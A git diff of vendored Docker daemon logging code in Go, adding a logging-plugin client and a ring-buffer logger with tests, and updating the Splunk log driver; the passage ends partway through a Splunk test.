b/vendor/github.com/docker/docker/daemon/logger/plugin.go @@ -0,0 +1,116 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/api/types/plugins/logdriver" + "github.com/docker/docker/errdefs" + getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + 
"github.com/docker/docker/pkg/stringid" + "github.com/pkg/errors" +) + +var pluginGetter getter.PluginGetter + +const extName = "LogDriver" + +// logPlugin defines the available functions that logging plugins must implement. +type logPlugin interface { + StartLogging(streamPath string, info Info) (err error) + StopLogging(streamPath string) (err error) + Capabilities() (cap Capability, err error) + ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error) +} + +// RegisterPluginGetter sets the plugingetter +func RegisterPluginGetter(plugingetter getter.PluginGetter) { + pluginGetter = plugingetter +} + +// GetDriver returns a logging driver by its name. +// If the driver is empty, it looks for the local driver. +func getPlugin(name string, mode int) (Creator, error) { + p, err := pluginGetter.Get(name, extName, mode) + if err != nil { + return nil, fmt.Errorf("error looking up logging plugin %s: %v", name, err) + } + + client, err := makePluginClient(p) + if err != nil { + return nil, err + } + return makePluginCreator(name, client, p.ScopedPath), nil +} + +func makePluginClient(p getter.CompatPlugin) (logPlugin, error) { + if pc, ok := p.(getter.PluginWithV1Client); ok { + return &logPluginProxy{pc.Client()}, nil + } + pa, ok := p.(getter.PluginAddr) + if !ok { + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p)) + } + + if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", p) + } + + addr := pa.Addr() + c, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error making plugin client") + } + return &logPluginProxy{c}, nil +} + +func makePluginCreator(name string, l logPlugin, scopePath func(s string) string) Creator { + return func(logCtx Info) (logger Logger, err error) { + defer func() { + if err != nil { + pluginGetter.Get(name, extName, getter.Release) + } + }() + + 
unscopedPath := filepath.Join("/", "run", "docker", "logging") + logRoot := scopePath(unscopedPath) + if err := os.MkdirAll(logRoot, 0700); err != nil { + return nil, err + } + + id := stringid.GenerateNonCryptoID() + a := &pluginAdapter{ + driverName: name, + id: id, + plugin: l, + fifoPath: filepath.Join(logRoot, id), + logInfo: logCtx, + } + + cap, err := a.plugin.Capabilities() + if err == nil { + a.capabilities = cap + } + + stream, err := openPluginStream(a) + if err != nil { + return nil, err + } + + a.stream = stream + a.enc = logdriver.NewLogEntryEncoder(a.stream) + + if err := l.StartLogging(filepath.Join(unscopedPath, id), logCtx); err != nil { + return nil, errors.Wrapf(err, "error creating logger") + } + + if cap.ReadLogs { + return &pluginAdapterWithRead{a}, nil + } + + return a, nil + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go new file mode 100644 index 0000000000..e9a16af9b1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unix.go @@ -0,0 +1,23 @@ +// +build linux freebsd + +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "context" + "io" + + "github.com/containerd/fifo" + "github.com/pkg/errors" + "golang.org/x/sys/unix" +) + +func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) { + // Make sure to also open with read (in addition to write) to avoid borken pipe errors on plugin failure. + // It is up to the plugin to keep track of pipes that it should re-attach to, however. + // If the plugin doesn't open for reads, then the container will block once the pipe is full. 
+ f, err := fifo.OpenFifo(context.Background(), a.fifoPath, unix.O_RDWR|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, errors.Wrapf(err, "error creating i/o pipe for log plugin: %s", a.Name()) + } + return f, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go new file mode 100644 index 0000000000..2ad47cc077 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux,!freebsd + +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "io" +) + +func openPluginStream(a *pluginAdapter) (io.WriteCloser, error) { + return nil, errors.New("log plugin not supported") +} diff --git a/vendor/github.com/docker/docker/daemon/logger/proxy.go b/vendor/github.com/docker/docker/daemon/logger/proxy.go new file mode 100644 index 0000000000..4a1c778108 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/proxy.go @@ -0,0 +1,107 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "io" +) + +type client interface { + Call(string, interface{}, interface{}) error + Stream(string, interface{}) (io.ReadCloser, error) +} + +type logPluginProxy struct { + client +} + +type logPluginProxyStartLoggingRequest struct { + File string + Info Info +} + +type logPluginProxyStartLoggingResponse struct { + Err string +} + +func (pp *logPluginProxy) StartLogging(file string, info Info) (err error) { + var ( + req logPluginProxyStartLoggingRequest + ret logPluginProxyStartLoggingResponse + ) + + req.File = file + req.Info = info + if err = pp.Call("LogDriver.StartLogging", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyStopLoggingRequest struct { + File string +} + +type logPluginProxyStopLoggingResponse struct { + Err string +} + +func (pp 
*logPluginProxy) StopLogging(file string) (err error) { + var ( + req logPluginProxyStopLoggingRequest + ret logPluginProxyStopLoggingResponse + ) + + req.File = file + if err = pp.Call("LogDriver.StopLogging", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyCapabilitiesResponse struct { + Cap Capability + Err string +} + +func (pp *logPluginProxy) Capabilities() (cap Capability, err error) { + var ( + ret logPluginProxyCapabilitiesResponse + ) + + if err = pp.Call("LogDriver.Capabilities", nil, &ret); err != nil { + return + } + + cap = ret.Cap + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type logPluginProxyReadLogsRequest struct { + Info Info + Config ReadConfig +} + +func (pp *logPluginProxy) ReadLogs(info Info, config ReadConfig) (stream io.ReadCloser, err error) { + var ( + req logPluginProxyReadLogsRequest + ) + + req.Info = info + req.Config = config + return pp.Stream("LogDriver.ReadLogs", req) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/ring.go b/vendor/github.com/docker/docker/daemon/logger/ring.go new file mode 100644 index 0000000000..c675c1e83c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/ring.go @@ -0,0 +1,223 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "errors" + "sync" + "sync/atomic" + + "github.com/sirupsen/logrus" +) + +const ( + defaultRingMaxSize = 1e6 // 1MB +) + +// RingLogger is a ring buffer that implements the Logger interface. +// This is used when lossy logging is OK. 
+type RingLogger struct { + buffer *messageRing + l Logger + logInfo Info + closeFlag int32 +} + +type ringWithReader struct { + *RingLogger +} + +func (r *ringWithReader) ReadLogs(cfg ReadConfig) *LogWatcher { + reader, ok := r.l.(LogReader) + if !ok { + // something is wrong if we get here + panic("expected log reader") + } + return reader.ReadLogs(cfg) +} + +func newRingLogger(driver Logger, logInfo Info, maxSize int64) *RingLogger { + l := &RingLogger{ + buffer: newRing(maxSize), + l: driver, + logInfo: logInfo, + } + go l.run() + return l +} + +// NewRingLogger creates a new Logger that is implemented as a RingBuffer wrapping +// the passed in logger. +func NewRingLogger(driver Logger, logInfo Info, maxSize int64) Logger { + if maxSize < 0 { + maxSize = defaultRingMaxSize + } + l := newRingLogger(driver, logInfo, maxSize) + if _, ok := driver.(LogReader); ok { + return &ringWithReader{l} + } + return l +} + +// Log queues messages into the ring buffer +func (r *RingLogger) Log(msg *Message) error { + if r.closed() { + return errClosed + } + return r.buffer.Enqueue(msg) +} + +// Name returns the name of the underlying logger +func (r *RingLogger) Name() string { + return r.l.Name() +} + +func (r *RingLogger) closed() bool { + return atomic.LoadInt32(&r.closeFlag) == 1 +} + +func (r *RingLogger) setClosed() { + atomic.StoreInt32(&r.closeFlag, 1) +} + +// Close closes the logger +func (r *RingLogger) Close() error { + r.setClosed() + r.buffer.Close() + // empty out the queue + var logErr bool + for _, msg := range r.buffer.Drain() { + if logErr { + // some error logging a previous message, so re-insert to message pool + // and assume log driver is hosed + PutMessage(msg) + continue + } + + if err := r.l.Log(msg); err != nil { + logrus.WithField("driver", r.l.Name()). + WithField("container", r.logInfo.ContainerID). + WithError(err). 
+ Errorf("Error writing log message") + logErr = true + } + } + return r.l.Close() +} + +// run consumes messages from the ring buffer and forwards them to the underling +// logger. +// This is run in a goroutine when the RingLogger is created +func (r *RingLogger) run() { + for { + if r.closed() { + return + } + msg, err := r.buffer.Dequeue() + if err != nil { + // buffer is closed + return + } + if err := r.l.Log(msg); err != nil { + logrus.WithField("driver", r.l.Name()). + WithField("container", r.logInfo.ContainerID). + WithError(err). + Errorf("Error writing log message") + } + } +} + +type messageRing struct { + mu sync.Mutex + // signals callers of `Dequeue` to wake up either on `Close` or when a new `Message` is added + wait *sync.Cond + + sizeBytes int64 // current buffer size + maxBytes int64 // max buffer size size + queue []*Message + closed bool +} + +func newRing(maxBytes int64) *messageRing { + queueSize := 1000 + if maxBytes == 0 || maxBytes == 1 { + // With 0 or 1 max byte size, the maximum size of the queue would only ever be 1 + // message long. + queueSize = 1 + } + + r := &messageRing{queue: make([]*Message, 0, queueSize), maxBytes: maxBytes} + r.wait = sync.NewCond(&r.mu) + return r +} + +// Enqueue adds a message to the buffer queue +// If the message is too big for the buffer it drops the new message. +// If there are no messages in the queue and the message is still too big, it adds the message anyway. +func (r *messageRing) Enqueue(m *Message) error { + mSize := int64(len(m.Line)) + + r.mu.Lock() + if r.closed { + r.mu.Unlock() + return errClosed + } + if mSize+r.sizeBytes > r.maxBytes && len(r.queue) > 0 { + r.wait.Signal() + r.mu.Unlock() + return nil + } + + r.queue = append(r.queue, m) + r.sizeBytes += mSize + r.wait.Signal() + r.mu.Unlock() + return nil +} + +// Dequeue pulls a message off the queue +// If there are no messages, it waits for one. +// If the buffer is closed, it will return immediately. 
+func (r *messageRing) Dequeue() (*Message, error) { + r.mu.Lock() + for len(r.queue) == 0 && !r.closed { + r.wait.Wait() + } + + if r.closed { + r.mu.Unlock() + return nil, errClosed + } + + msg := r.queue[0] + r.queue = r.queue[1:] + r.sizeBytes -= int64(len(msg.Line)) + r.mu.Unlock() + return msg, nil +} + +var errClosed = errors.New("closed") + +// Close closes the buffer ensuring no new messages can be added. +// Any callers waiting to dequeue a message will be woken up. +func (r *messageRing) Close() { + r.mu.Lock() + if r.closed { + r.mu.Unlock() + return + } + + r.closed = true + r.wait.Broadcast() + r.mu.Unlock() +} + +// Drain drains all messages from the queue. +// This can be used after `Close()` to get any remaining messages that were in queue. +func (r *messageRing) Drain() []*Message { + r.mu.Lock() + ls := make([]*Message, 0, len(r.queue)) + ls = append(ls, r.queue...) + r.sizeBytes = 0 + r.queue = r.queue[:0] + r.mu.Unlock() + return ls +} diff --git a/vendor/github.com/docker/docker/daemon/logger/ring_test.go b/vendor/github.com/docker/docker/daemon/logger/ring_test.go new file mode 100644 index 0000000000..a2289cc667 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/ring_test.go @@ -0,0 +1,299 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "context" + "strconv" + "testing" + "time" +) + +type mockLogger struct{ c chan *Message } + +func (l *mockLogger) Log(msg *Message) error { + l.c <- msg + return nil +} + +func (l *mockLogger) Name() string { + return "mock" +} + +func (l *mockLogger) Close() error { + return nil +} + +func TestRingLogger(t *testing.T) { + mockLog := &mockLogger{make(chan *Message)} // no buffer on this channel + ring := newRingLogger(mockLog, Info{}, 1) + defer ring.setClosed() + + // this should never block + ring.Log(&Message{Line: []byte("1")}) + ring.Log(&Message{Line: []byte("2")}) + ring.Log(&Message{Line: []byte("3")}) + + select { + case msg := <-mockLog.c: + if 
string(msg.Line) != "1" { + t.Fatalf("got unexpected msg: %q", string(msg.Line)) + } + case <-time.After(100 * time.Millisecond): + t.Fatal("timeout reading log message") + } + + select { + case msg := <-mockLog.c: + t.Fatalf("expected no more messages in the queue, got: %q", string(msg.Line)) + default: + } +} + +func TestRingCap(t *testing.T) { + r := newRing(5) + for i := 0; i < 10; i++ { + // queue messages with "0" to "10" + // the "5" to "10" messages should be dropped since we only allow 5 bytes in the buffer + if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil { + t.Fatal(err) + } + } + + // should have messages in the queue for "0" to "4" + for i := 0; i < 5; i++ { + m, err := r.Dequeue() + if err != nil { + t.Fatal(err) + } + if string(m.Line) != strconv.Itoa(i) { + t.Fatalf("got unexpected message for iter %d: %s", i, string(m.Line)) + } + } + + // queue a message that's bigger than the buffer cap + if err := r.Enqueue(&Message{Line: []byte("hello world")}); err != nil { + t.Fatal(err) + } + + // queue another message that's bigger than the buffer cap + if err := r.Enqueue(&Message{Line: []byte("eat a banana")}); err != nil { + t.Fatal(err) + } + + m, err := r.Dequeue() + if err != nil { + t.Fatal(err) + } + if string(m.Line) != "hello world" { + t.Fatalf("got unexpected message: %s", string(m.Line)) + } + if len(r.queue) != 0 { + t.Fatalf("expected queue to be empty, got: %d", len(r.queue)) + } +} + +func TestRingClose(t *testing.T) { + r := newRing(1) + if err := r.Enqueue(&Message{Line: []byte("hello")}); err != nil { + t.Fatal(err) + } + r.Close() + if err := r.Enqueue(&Message{}); err != errClosed { + t.Fatalf("expected errClosed, got: %v", err) + } + if len(r.queue) != 1 { + t.Fatal("expected empty queue") + } + if m, err := r.Dequeue(); err == nil || m != nil { + t.Fatal("expected err on Dequeue after close") + } + + ls := r.Drain() + if len(ls) != 1 { + t.Fatalf("expected one message: %v", ls) + } + if string(ls[0].Line) != 
"hello" { + t.Fatalf("got unexpected message: %s", string(ls[0].Line)) + } +} + +func TestRingDrain(t *testing.T) { + r := newRing(5) + for i := 0; i < 5; i++ { + if err := r.Enqueue(&Message{Line: []byte(strconv.Itoa(i))}); err != nil { + t.Fatal(err) + } + } + + ls := r.Drain() + if len(ls) != 5 { + t.Fatal("got unexpected length after drain") + } + + for i := 0; i < 5; i++ { + if string(ls[i].Line) != strconv.Itoa(i) { + t.Fatalf("got unexpected message at position %d: %s", i, string(ls[i].Line)) + } + } + if r.sizeBytes != 0 { + t.Fatalf("expected buffer size to be 0 after drain, got: %d", r.sizeBytes) + } + + ls = r.Drain() + if len(ls) != 0 { + t.Fatalf("expected 0 messages on 2nd drain: %v", ls) + } + +} + +type nopLogger struct{} + +func (nopLogger) Name() string { return "nopLogger" } +func (nopLogger) Close() error { return nil } +func (nopLogger) Log(*Message) error { return nil } + +func BenchmarkRingLoggerThroughputNoReceiver(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputWithReceiverDelay0(b *testing.B) { + l := NewRingLogger(nopLogger{}, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func consumeWithDelay(delay time.Duration, c <-chan *Message) (cancel func()) { + started := make(chan struct{}) + ctx, cancel := context.WithCancel(context.Background()) + go func() { + close(started) + ticker := time.NewTicker(delay) + for range ticker.C { + select { + case <-ctx.Done(): + ticker.Stop() + return + case <-c: + } + } + }() + <-started + return cancel +} + +func 
BenchmarkRingLoggerThroughputConsumeDelay1(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(1*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay10(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(10*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay50(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(50*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay100(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(100*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay300(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + 
msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(300*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkRingLoggerThroughputConsumeDelay500(b *testing.B) { + mockLog := &mockLogger{make(chan *Message)} + defer mockLog.Close() + l := NewRingLogger(mockLog, Info{}, -1) + msg := &Message{Line: []byte("hello humans and everyone else!")} + b.SetBytes(int64(len(msg.Line))) + + cancel := consumeWithDelay(500*time.Millisecond, mockLog.c) + defer cancel() + + for i := 0; i < b.N; i++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go index f85832681a..8756ffa3b2 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go @@ -1,10 +1,11 @@ // Package splunk provides the log driver for forwarding server logs to // Splunk HTTP Event Collector endpoint. 
-package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "bytes" "compress/gzip" + "context" "crypto/tls" "crypto/x509" "encoding/json" @@ -15,13 +16,15 @@ import ( "net/url" "os" "strconv" + "strings" "sync" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/urlutil" + "github.com/sirupsen/logrus" ) const ( @@ -39,6 +42,7 @@ const ( splunkGzipCompressionKey = "splunk-gzip" splunkGzipCompressionLevelKey = "splunk-gzip-level" envKey = "env" + envRegexKey = "env-regex" labelsKey = "labels" tagKey = "tag" ) @@ -52,6 +56,8 @@ const ( defaultBufferMaximum = 10 * defaultPostMessagesBatchSize // Number of messages allowed to be queued in the channel defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize + // maxResponseSize is the max amount that will be read from an http response + maxResponseSize = 1024 ) const ( @@ -61,6 +67,8 @@ const ( envVarStreamChannelSize = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE" ) +var batchSendTimeout = 30 * time.Second + type splunkLoggerInterface interface { logger.Logger worker() @@ -140,20 +148,20 @@ func init() { } // New creates splunk logger driver using configuration passed in context -func New(ctx logger.Context) (logger.Logger, error) { - hostname, err := ctx.Hostname() +func New(info logger.Info) (logger.Logger, error) { + hostname, err := info.Hostname() if err != nil { return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName) } // Parse and validate Splunk URL - splunkURL, err := parseURL(ctx) + splunkURL, err := parseURL(info) if err != nil { return nil, err } // Splunk Token is required parameter - splunkToken, ok := ctx.Config[splunkTokenKey] + splunkToken, ok := info.Config[splunkTokenKey] if !ok { return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey) } @@ -162,7 +170,7 @@ func New(ctx 
logger.Context) (logger.Logger, error) { // Splunk is using autogenerated certificates by default, // allow users to trust them with skipping verification - if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok { + if insecureSkipVerifyStr, ok := info.Config[splunkInsecureSkipVerifyKey]; ok { insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr) if err != nil { return nil, err @@ -171,7 +179,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } // If path to the root certificate is provided - load it - if caPath, ok := ctx.Config[splunkCAPathKey]; ok { + if caPath, ok := info.Config[splunkCAPathKey]; ok { caCert, err := ioutil.ReadFile(caPath) if err != nil { return nil, err @@ -181,12 +189,12 @@ func New(ctx logger.Context) (logger.Logger, error) { tlsConfig.RootCAs = caPool } - if caName, ok := ctx.Config[splunkCANameKey]; ok { + if caName, ok := info.Config[splunkCANameKey]; ok { tlsConfig.ServerName = caName } gzipCompression := false - if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok { + if gzipCompressionStr, ok := info.Config[splunkGzipCompressionKey]; ok { gzipCompression, err = strconv.ParseBool(gzipCompressionStr) if err != nil { return nil, err @@ -194,7 +202,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } gzipCompressionLevel := gzip.DefaultCompression - if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok { + if gzipCompressionLevelStr, ok := info.Config[splunkGzipCompressionLevelKey]; ok { var err error gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32) if err != nil { @@ -202,7 +210,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } gzipCompressionLevel = int(gzipCompressionLevel64) if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression { - err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).", + err := fmt.Errorf("not supported 
level '%s' for %s (supported values between %d and %d)", gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression) return nil, err } @@ -210,14 +218,15 @@ func New(ctx logger.Context) (logger.Logger, error) { transport := &http.Transport{ TLSClientConfig: tlsConfig, + Proxy: http.ProxyFromEnvironment, } client := &http.Client{ Transport: transport, } - source := ctx.Config[splunkSourceKey] - sourceType := ctx.Config[splunkSourceTypeKey] - index := ctx.Config[splunkIndexKey] + source := info.Config[splunkSourceKey] + sourceType := info.Config[splunkSourceTypeKey] + index := info.Config[splunkIndexKey] var nullMessage = &splunkMessage{ Host: hostname, @@ -228,14 +237,17 @@ func New(ctx logger.Context) (logger.Logger, error) { // Allow user to remove tag from the messages by setting tag to empty string tag := "" - if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" { - tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if tagTemplate, ok := info.Config[tagKey]; !ok || tagTemplate != "" { + tag, err = loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } } - attrs := ctx.ExtraAttributes(nil) + attrs, err := info.ExtraAttributes(nil) + if err != nil { + return nil, err + } var ( postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency) @@ -260,7 +272,7 @@ func New(ctx logger.Context) (logger.Logger, error) { // By default we verify connection, but we allow use to skip that verifyConnection := true - if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok { + if verifyConnectionStr, ok := info.Config[splunkVerifyConnectionKey]; ok { var err error verifyConnection, err = strconv.ParseBool(verifyConnectionStr) if err != nil { @@ -275,7 +287,7 @@ func New(ctx logger.Context) (logger.Logger, error) { } var splunkFormat string - if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; ok { + 
if splunkFormatParsed, ok := info.Config[splunkFormatKey]; ok { switch splunkFormatParsed { case splunkFormatInline: case splunkFormatJSON: @@ -336,7 +348,7 @@ func (l *splunkLoggerInline) Log(msg *logger.Message) error { event.Source = msg.Source message.Event = &event - + logger.PutMessage(msg) return l.queueMessageAsync(message) } @@ -354,15 +366,20 @@ func (l *splunkLoggerJSON) Log(msg *logger.Message) error { event.Source = msg.Source message.Event = &event - + logger.PutMessage(msg) return l.queueMessageAsync(message) } func (l *splunkLoggerRaw) Log(msg *logger.Message) error { + // empty or whitespace-only messages are not accepted by HEC + if strings.TrimSpace(string(msg.Line)) == "" { + return nil + } + message := l.createSplunkMessage(msg) message.Event = string(append(l.prefix, msg.Line...)) - + logger.PutMessage(msg) return l.queueMessageAsync(message) } @@ -406,13 +423,18 @@ func (l *splunkLogger) worker() { func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage { messagesLen := len(messages) + + ctx, cancel := context.WithTimeout(context.Background(), batchSendTimeout) + defer cancel() + for i := 0; i < messagesLen; i += l.postMessagesBatchSize { upperBound := i + l.postMessagesBatchSize if upperBound > messagesLen { upperBound = messagesLen } - if err := l.tryPostMessages(messages[i:upperBound]); err != nil { - logrus.Error(err) + + if err := l.tryPostMessages(ctx, messages[i:upperBound]); err != nil { + logrus.WithError(err).WithField("module", "logger/splunk").Warn("Error while sending logs") if messagesLen-i >= l.bufferMaximum || lastChance { // If this is last chance - print them all to the daemon log if lastChance { @@ -437,7 +459,7 @@ func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) return messages[:0] } -func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { +func (l *splunkLogger) tryPostMessages(ctx context.Context, messages []*splunkMessage) error { 
if len(messages) == 0 { return nil } @@ -476,25 +498,28 @@ func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { if err != nil { return err } + req = req.WithContext(ctx) req.Header.Set("Authorization", l.auth) // Tell if we are sending gzip compressed body if l.gzipCompression { req.Header.Set("Content-Encoding", "gzip") } - res, err := l.client.Do(req) + resp, err := l.client.Do(req) if err != nil { return err } - defer res.Body.Close() - if res.StatusCode != http.StatusOK { - var body []byte - body, err = ioutil.ReadAll(res.Body) + defer func() { + pools.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + }() + if resp.StatusCode != http.StatusOK { + rdr := io.LimitReader(resp.Body, maxResponseSize) + body, err := ioutil.ReadAll(rdr) if err != nil { return err } - return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body) + return fmt.Errorf("%s: failed to send event - %s - %s", driverName, resp.Status, string(body)) } - io.Copy(ioutil.Discard, res.Body) return nil } @@ -538,6 +563,7 @@ func ValidateLogOpt(cfg map[string]string) error { case splunkGzipCompressionKey: case splunkGzipCompressionLevelKey: case envKey: + case envRegexKey: case labelsKey: case tagKey: default: @@ -547,8 +573,8 @@ func ValidateLogOpt(cfg map[string]string) error { return nil } -func parseURL(ctx logger.Context) (*url.URL, error) { - splunkURLStr, ok := ctx.Config[splunkURLKey] +func parseURL(info logger.Info) (*url.URL, error) { + splunkURLStr, ok := info.Config[splunkURLKey] if !ok { return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey) } @@ -576,20 +602,22 @@ func verifySplunkConnection(l *splunkLogger) error { if err != nil { return err } - res, err := l.client.Do(req) + resp, err := l.client.Do(req) if err != nil { return err } - if res.Body != nil { - defer res.Body.Close() - } - if res.StatusCode != http.StatusOK { - var body []byte - body, err = ioutil.ReadAll(res.Body) + defer func() { + 
pools.Copy(ioutil.Discard, resp.Body) + resp.Body.Close() + }() + + if resp.StatusCode != http.StatusOK { + rdr := io.LimitReader(resp.Body, maxResponseSize) + body, err := ioutil.ReadAll(rdr) if err != nil { return err } - return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body) + return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, resp.Status, string(body)) } return nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go index df74cbad5f..cfb83e80d1 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go @@ -1,13 +1,18 @@ -package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "compress/gzip" + "context" "fmt" + "net/http" "os" + "runtime" "testing" "time" "github.com/docker/docker/daemon/logger" + "gotest.tools/assert" + "gotest.tools/env" ) // Validate options @@ -25,9 +30,10 @@ func TestValidateLogOpt(t *testing.T) { splunkVerifyConnectionKey: "true", splunkGzipCompressionKey: "true", splunkGzipCompressionLevelKey: "1", - envKey: "a", - labelsKey: "b", - tagKey: "c", + envKey: "a", + envRegexKey: "^foo", + labelsKey: "b", + tagKey: "c", }) if err != nil { t.Fatal(err) @@ -43,10 +49,10 @@ func TestValidateLogOpt(t *testing.T) { // Driver require user to specify required options func TestNewMissedConfig(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{}, } - _, err := New(ctx) + _, err := New(info) if err == nil { t.Fatal("Logger driver should fail when no required parameters specified") } @@ -54,12 +60,12 @@ 